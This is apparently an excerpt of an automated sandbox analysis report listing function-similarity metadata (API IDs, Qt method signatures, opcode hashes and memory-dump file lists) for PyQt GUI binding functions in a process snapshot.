                                                                                                                                                                                                                • String ID: QTextCharFormat$fontFixedPitch$fontFixedPitch(self) -> bool
                                                                                                                                                                                                                • API String ID: 3344510876-2386052853
                                                                                                                                                                                                                • Opcode ID: 77e06e29e5b71345a5514b7677db195298e583a11e6fa76bdf397a4ca6cd8c09
                                                                                                                                                                                                                • Instruction ID: 1a7912fe161d4fcfd3afcf3ad534124a5b20e19d565099fe7d733d239a29fcb3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77e06e29e5b71345a5514b7677db195298e583a11e6fa76bdf397a4ca6cd8c09
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98011AB5A08B56C1EB10DF65E8886A937B8FB94784FA180B6CA5D03320CF7DD659C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?testBool_FormatFormat@@FromLongOption@Option@1@@Surface
                                                                                                                                                                                                                • String ID: QSurfaceFormat$stereo$stereo(self) -> bool
                                                                                                                                                                                                                • API String ID: 808278463-1067816198
                                                                                                                                                                                                                • Opcode ID: 67868ea12c44d5fb7eefa559aff8f5382f33da0c9c83aedb429789250cf652b7
                                                                                                                                                                                                                • Instruction ID: 5d1f7041b3d5bd11a8f72e5f7217ef432fcace958f447061778b953973401051
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67868ea12c44d5fb7eefa559aff8f5382f33da0c9c83aedb429789250cf652b7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC012CB5A08A56C1EB10DF71E8986A933A8FB55744F9140B6CE5D43324CF7DD55AC380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?hasBool_Clipping@FromLongPainter@@
                                                                                                                                                                                                                • String ID: QPainter$hasClipping$hasClipping(self) -> bool
                                                                                                                                                                                                                • API String ID: 2826564307-3272688965
                                                                                                                                                                                                                • Opcode ID: b8c246f5ced8e92eca641af799bf6dc5e917110774232f18352303897fc077d2
                                                                                                                                                                                                                • Instruction ID: b66e8a0227888d4377f0db6e185d568f14fda7313f1d69b0fe6cca65db330d95
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b8c246f5ced8e92eca641af799bf6dc5e917110774232f18352303897fc077d2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B0128B5A18B5AC1EB10DF31E8986A933A8FB94B44FA140B6CE5D43320CF7CD54AC780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?textFromInlineLongLong_Object@@Position@Text
                                                                                                                                                                                                                • String ID: QTextInlineObject$textPosition$textPosition(self) -> int
                                                                                                                                                                                                                • API String ID: 2776140407-124157796
                                                                                                                                                                                                                • Opcode ID: 582a172e992d6740ca3455f66f78b8dc35f677873c6d62a3c268a06e81df0ff2
                                                                                                                                                                                                                • Instruction ID: 8a14971ee63b5b58550217cb2db458bd44e6c57b399e27b0959e776237cd2c04
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 582a172e992d6740ca3455f66f78b8dc35f677873c6d62a3c268a06e81df0ff2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9011AB5B08B46C1EB109F71E8496A833A8FB94B84F9140B2CA4D43360CF7DD549C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?position@Fragment@@FromLongLong_Text
                                                                                                                                                                                                                • String ID: QTextFragment$position$position(self) -> int
                                                                                                                                                                                                                • API String ID: 1931772406-1207288702
                                                                                                                                                                                                                • Opcode ID: 92832a60bd70b47134c56bda7089d5ca6572e2a94830b66cdda358218d986089
                                                                                                                                                                                                                • Instruction ID: 5d0a293239f4be8072873e12a02eb464063fbd03b64f28c8b07f39a209c3bb2a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92832a60bd70b47134c56bda7089d5ca6572e2a94830b66cdda358218d986089
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22012CB5B08A46C1EB109F70E8586A833A8FB54B54FA140B2CA5D43320DFBDD959C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLongNull@Vector4
                                                                                                                                                                                                                • String ID: QVector4D$isNull$isNull(self) -> bool
                                                                                                                                                                                                                • API String ID: 3909539051-2332985828
                                                                                                                                                                                                                • Opcode ID: 3d35bfbdd5869d7e461e215ae19ce0d4a6bcd7502145eb25b12ac24b0aa6682d
                                                                                                                                                                                                                • Instruction ID: 738967599007ce47fea0e32da33604625a2a0f6d3befbfa9237a62f61812c97e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d35bfbdd5869d7e461e215ae19ce0d4a6bcd7502145eb25b12ac24b0aa6682d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 270128B5B08B46D1EB109F71E8986A837A8FB94B45FA140B2CE5C43320DF7CD59AC380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?weight@Font@@FromLongLong_
                                                                                                                                                                                                                • String ID: QRawFont$weight$weight(self) -> int
                                                                                                                                                                                                                • API String ID: 1495005862-2304509088
                                                                                                                                                                                                                • Opcode ID: 57d9e1fda54ad3606fb87fd0d9dd8a563fe6de241204256db539e28b588a2d22
                                                                                                                                                                                                                • Instruction ID: c60222f16540af719764366fbab0ff38f051ed20af8745a5772852f4541aca59
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57d9e1fda54ad3606fb87fd0d9dd8a563fe6de241204256db539e28b588a2d22
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50011AB5B08B46D1EB509F75E8586A833A8FB94744F9140B2CE4C43320DF7CD949C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?length@Fragment@@FromLongLong_Text
                                                                                                                                                                                                                • String ID: QTextFragment$length$length(self) -> int
                                                                                                                                                                                                                • API String ID: 3894585651-2905367999
                                                                                                                                                                                                                • Opcode ID: da8f611d82748ebdea820eec21723de1dd46223c9bbf2bc53f9221ccc5ced96f
                                                                                                                                                                                                                • Instruction ID: 973d1fc0554a6d09af4888fdcbf584c70542d393b084042d388821b8be985ee9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: da8f611d82748ebdea820eec21723de1dd46223c9bbf2bc53f9221ccc5ced96f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA012CB5B08B46D1EB108F74E8486A833A8FB54B84F9140B6CA4D43324DF7DD549C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?lineCount@Document@@FromLongLong_Text
                                                                                                                                                                                                                • String ID: QTextDocument$lineCount$lineCount(self) -> int
                                                                                                                                                                                                                • API String ID: 3258379902-1896213649
                                                                                                                                                                                                                • Opcode ID: 9e412bc7ef241f319fc6e820cfbf1fcc817a01528f3604dacdac3ffc2ba983e7
                                                                                                                                                                                                                • Instruction ID: 97c585a6745250fb5b9c9f8dd1663026e005c5df4347689e2042aa30ec0e7fe4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e412bc7ef241f319fc6e820cfbf1fcc817a01528f3604dacdac3ffc2ba983e7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79012CB5B08A46C1EB109F71E8586A933A8FB54744FA140B2CA4D43320CF7DD949C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
